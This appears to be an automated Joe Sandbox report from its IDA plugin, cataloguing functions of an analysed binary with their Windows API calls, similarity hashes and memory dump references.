                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessagePostSleep$RectWindow
                                        • String ID:
                                        • API String ID: 3382505437-0
                                        • Opcode ID: 9dc4488e5f9667297f5a665f6a9c5d75b766a961a4180def9889927aec37158a
                                        • Instruction ID: 335f6ba12df353ac23dce7168f7a261098b1a58f6b98aab3d3d799a1112c6bd7
                                        • Opcode Fuzzy Hash: 9dc4488e5f9667297f5a665f6a9c5d75b766a961a4180def9889927aec37158a
                                        • Instruction Fuzzy Hash: 3031C07160021DEFDB14CF68DE4CA9E7BB6FB04315F10422AF925E62D0C7B09915DB90
                                        Function 00EDB6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 00EDB6C7
                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00EDB6E4
                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00EDB71C
                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00EDB742
                                        • _wcsstr.LIBCMT ref: 00EDB74C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                        • String ID:
                                        • API String ID: 3902887630-0
                                        • Opcode ID: 94bb02bea81c74c5af88c287b8aa7e49d3984ddb47ed1e035acd250e75565949
                                        • Instruction ID: b91b3a98a8b55abd6a8b405a5cf0e907f2e2bb2d274b7d07a0fb2b775d1bf655
                                        • Opcode Fuzzy Hash: 94bb02bea81c74c5af88c287b8aa7e49d3984ddb47ed1e035acd250e75565949
                                        • Instruction Fuzzy Hash: FE21D731204204FBEB255B399C49E7B7B9CEF4A760F01516BF805EA2A1FB61DC429660
                                        Function 00F0B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00F0B44C
                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00F0B471
                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00F0B489
                                        • GetSystemMetrics.USER32(00000004), ref: 00F0B4B2
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00EF1184,00000000), ref: 00F0B4D0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$Long$MetricsSystem
                                        • String ID:
                                        • API String ID: 2294984445-0
                                        • Opcode ID: a6ce8afc5c03cfe0f99b0506baeb19ed1665b3c295105fbec83bd081e2070333
                                        • Instruction ID: 7f573414b167fdfe88117bb64a049d7fb903633b63355555143abc9f94663d74
                                        • Opcode Fuzzy Hash: a6ce8afc5c03cfe0f99b0506baeb19ed1665b3c295105fbec83bd081e2070333
                                        • Instruction Fuzzy Hash: 34215C75910265AFCB20DF388C48A6A3BA4FB05730B154629FD26D66E2E7309A50FB90
                                        Function 00ED97E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00ED9802
                                          • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00ED9834
                                        • __itow.LIBCMT ref: 00ED984C
                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00ED9874
                                        • __itow.LIBCMT ref: 00ED9885
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: MessageSend$__itow$_memmove
                                        • String ID:
                                        • API String ID: 2983881199-0
                                        • Opcode ID: 7fc0a3f31f07f1f9edef986280adb6c7eda5d1cd8cc4c1652905887e9bcabb86
                                        • Instruction ID: 74e44f9187f45adb53c8bc92daba6bace42bbcf410938b0e69c4439aac26b01a
                                        • Opcode Fuzzy Hash: 7fc0a3f31f07f1f9edef986280adb6c7eda5d1cd8cc4c1652905887e9bcabb86
                                        • Instruction Fuzzy Hash: F3210035B002046FDB14AA718C86EEE7BE8EF4AB14F041026FD05FB341D670DD46A791
                                        Function 00E812F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E8134D
                                        • SelectObject.GDI32(?,00000000), ref: 00E8135C
                                        • BeginPath.GDI32(?), ref: 00E81373
                                        • SelectObject.GDI32(?,00000000), ref: 00E8139C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: ObjectSelect$BeginCreatePath
                                        • String ID:
                                        • API String ID: 3225163088-0
                                        • Opcode ID: 3b7d0eead5154bd0f8e10553b9baddcb3f07c3da8cf5c7459d3ceafb4e00ab7c
                                        • Instruction ID: f769fbba0092325fe082c005ad41211150c705c7230d746b563b507d12ff8f18
                                        • Opcode Fuzzy Hash: 3b7d0eead5154bd0f8e10553b9baddcb3f07c3da8cf5c7459d3ceafb4e00ab7c
                                        • Instruction Fuzzy Hash: 4C215E7480030CEBDB11AF25DC047A97BB9FB22326F148266F818E65A0D3719896EB91
                                        Function 00EDC161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memcmp
                                        • String ID:
                                        • API String ID: 2931989736-0
                                        • Opcode ID: 99ec14ffbb27ec9ac93eb63ff421c65563115439c0bdfb94ec848b368d9c2bef
                                        • Instruction ID: c4e513e58648d3b9e232724f97b89aa81f60b3f0c6e4f87b85add8f0cb993994
                                        • Opcode Fuzzy Hash: 99ec14ffbb27ec9ac93eb63ff421c65563115439c0bdfb94ec848b368d9c2bef
                                        • Instruction Fuzzy Hash: 0B0196716052277BD204A6215C42EEF77ACDF563E8F145152FD04FA343E661EE12D2E1
                                        Function 00EE4D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 00EE4D5C
                                        • __beginthreadex.LIBCMT ref: 00EE4D7A
                                        • MessageBoxW.USER32(?,?,?,?), ref: 00EE4D8F
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00EE4DA5
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00EE4DAC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                        • String ID:
                                        • API String ID: 3824534824-0
                                        • Opcode ID: 6e8ddf202f549aa83052be5e3abcfd7bfa8c7c19c81ee1dc33026b9404796ae5
                                        • Instruction ID: 61a0fa92f1b38d6c6f399c4d7999f1df9220a80b0f0d4771434a95dc64493ae9
                                        • Opcode Fuzzy Hash: 6e8ddf202f549aa83052be5e3abcfd7bfa8c7c19c81ee1dc33026b9404796ae5
                                        • Instruction Fuzzy Hash: 0C1104B690424CBBCB119FA99C08ADA7FACEB9A324F144265FD14E3290D6B18D4497A1
                                        Function 00ED874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00ED8766
                                        • GetLastError.KERNEL32(?,00ED822A,?,?,?), ref: 00ED8770
                                        • GetProcessHeap.KERNEL32(00000008,?,?,00ED822A,?,?,?), ref: 00ED877F
                                        • RtlAllocateHeap.NTDLL(00000000,?,00ED822A), ref: 00ED8786
                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00ED879D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                        • String ID:
                                        • API String ID: 883493501-0
                                        • Opcode ID: a6a49fcb64cd96148f59b1a83ddc00f7e30c36b7c71ba9f77538a0df0e76317b
                                        • Instruction ID: 6c657d0ba45e4199025d7c4894d34a3c17918cbfb37a79da293a36b2b7c02953
                                        • Opcode Fuzzy Hash: a6a49fcb64cd96148f59b1a83ddc00f7e30c36b7c71ba9f77538a0df0e76317b
                                        • Instruction Fuzzy Hash: 0E016D71600208FFDB204FA6DD88D6B7BACFF89359720043AF849D2260DA329C05DA60
                                        Function 00EE54E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EE5502
                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00EE5510
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EE5518
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00EE5522
                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EE555E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                        • String ID:
                                        • API String ID: 2833360925-0
                                        • Opcode ID: a12e5fff57db7d0a98e554664237172679025bfaf1ca8fd666802f6a9011763c
                                        • Instruction ID: 5e8dbebc6019772709c5bd966824ea2b084f61d1d0f4ab765fddd664a438b346
                                        • Opcode Fuzzy Hash: a12e5fff57db7d0a98e554664237172679025bfaf1ca8fd666802f6a9011763c
                                        • Instruction Fuzzy Hash: BF012D36D00A5DDBCF10DFE9E8885EDBB79FB09715F401056E901B2540DB709558D7A1
                                        Function 00ED7652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CLSIDFromProgID.COMBASE ref: 00ED766F
                                        • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00ED768A
                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00ED758C,80070057,?,?), ref: 00ED7698
                                        • CoTaskMemFree.COMBASE(00000000), ref: 00ED76A8
                                        • CLSIDFromString.COMBASE(?,?), ref: 00ED76B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                        • String ID:
                                        • API String ID: 3897988419-0
                                        • Opcode ID: b7113607a85b908b49100a38bde38b8c58630ba456312d1819ad3958a27a3451
                                        • Instruction ID: be353b0d9d89a73b3229d0fc7e474671e13b955b2aed9cb9212bc55c57207303
                                        • Opcode Fuzzy Hash: b7113607a85b908b49100a38bde38b8c58630ba456312d1819ad3958a27a3451
                                        • Instruction Fuzzy Hash: FE0171B2605608ABDB209F58DD44AAA7FEDEB44751F14402AFD44E2211F731DD4597A0
                                        Function 00ED85F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00ED8608
                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00ED8612
                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00ED8621
                                        • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00ED8628
                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00ED863E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                        • String ID:
                                        • API String ID: 47921759-0
                                        • Opcode ID: deff1b399c48557fae45e3a65b5c775bb3bb70f3d53170ae2bf53e494f9e91eb
                                        • Instruction ID: 715de3dc67fbb9e11dafa72a1e11b5548bd8272b1895f6184d9cb5e53fffcfc8
                                        • Opcode Fuzzy Hash: deff1b399c48557fae45e3a65b5c775bb3bb70f3d53170ae2bf53e494f9e91eb
                                        • Instruction Fuzzy Hash: 2CF06231205308AFEB200FA9DD8DE6B3BACFF89768B005426F945D6250CB71DC46EA60
                                        Function 00ED8652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00ED8669
                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00ED8673
                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00ED8682
                                        • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00ED8689
                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00ED869F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                        • String ID:
                                        • API String ID: 47921759-0
                                        • Opcode ID: 5c6034dc71b6cfc803e1f0dbff7014bf9b0c1a09f17bab5f50fcef10dd668e79
                                        • Instruction ID: 8c82d4c91fc67f14b25a133d7a295819cc1e64c6a76792c48103806088504e1d
                                        • Opcode Fuzzy Hash: 5c6034dc71b6cfc803e1f0dbff7014bf9b0c1a09f17bab5f50fcef10dd668e79
                                        • Instruction Fuzzy Hash: C4F04F71200308BFEB211FA5EC88E673BACFF89768B100036F955D7250CA61D945EA60
                                        Function 00EDC6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00EDC6BA
                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00EDC6D1
                                        • MessageBeep.USER32(00000000), ref: 00EDC6E9
                                        • KillTimer.USER32(?,0000040A), ref: 00EDC705
                                        • EndDialog.USER32(?,00000001), ref: 00EDC71F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                        • String ID:
                                        • API String ID: 3741023627-0
                                        • Opcode ID: 279abd9201bb80a0f4d874e51ce8edc7df7642a04ab7976597159209dafcffa0
                                        • Instruction ID: c01cb00878e31f2eea7425bdf5d3cc60148d945a12fd4c834509ab099e271694
                                        • Opcode Fuzzy Hash: 279abd9201bb80a0f4d874e51ce8edc7df7642a04ab7976597159209dafcffa0
                                        • Instruction Fuzzy Hash: 4801A230400309ABEB315B20DD4EF9677B8FF04B45F14166AF586B15E0DBE1A959DF80
                                        Function 00E813B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        • EndPath.GDI32(?), ref: 00E813BF
                                        • StrokeAndFillPath.GDI32(?,?,00EBBAD8,00000000,?), ref: 00E813DB
                                        • SelectObject.GDI32(?,00000000), ref: 00E813EE
                                        • DeleteObject.GDI32 ref: 00E81401
                                        • StrokePath.GDI32(?), ref: 00E8141C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                        • String ID:
                                        • API String ID: 2625713937-0
                                        • Opcode ID: bad954fac0b54ffc504b0bffd523084a39d18b4a21018a4a9ce83a1d5e758be1
                                        • Instruction ID: 5b86d4a05ec0e1a3e682bde979b2ad92ad32568e4435a7e425f3a7469317306b
                                        • Opcode Fuzzy Hash: bad954fac0b54ffc504b0bffd523084a39d18b4a21018a4a9ce83a1d5e758be1
                                        • Instruction Fuzzy Hash: A8F0C97400470CEBDB226F26EC0C7583BA9BB22326F04D264E82D959F1C731499AEF51
                                        Function 00ED8E74 Relevance: 7.5, APIs: 5, Instructions: 23memorysynchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00ED8E7F
                                        • CloseHandle.KERNEL32(?), ref: 00ED8E94
                                        • CloseHandle.KERNEL32(?), ref: 00ED8E9C
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00ED8EA5
                                        • HeapFree.KERNEL32(00000000), ref: 00ED8EAC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
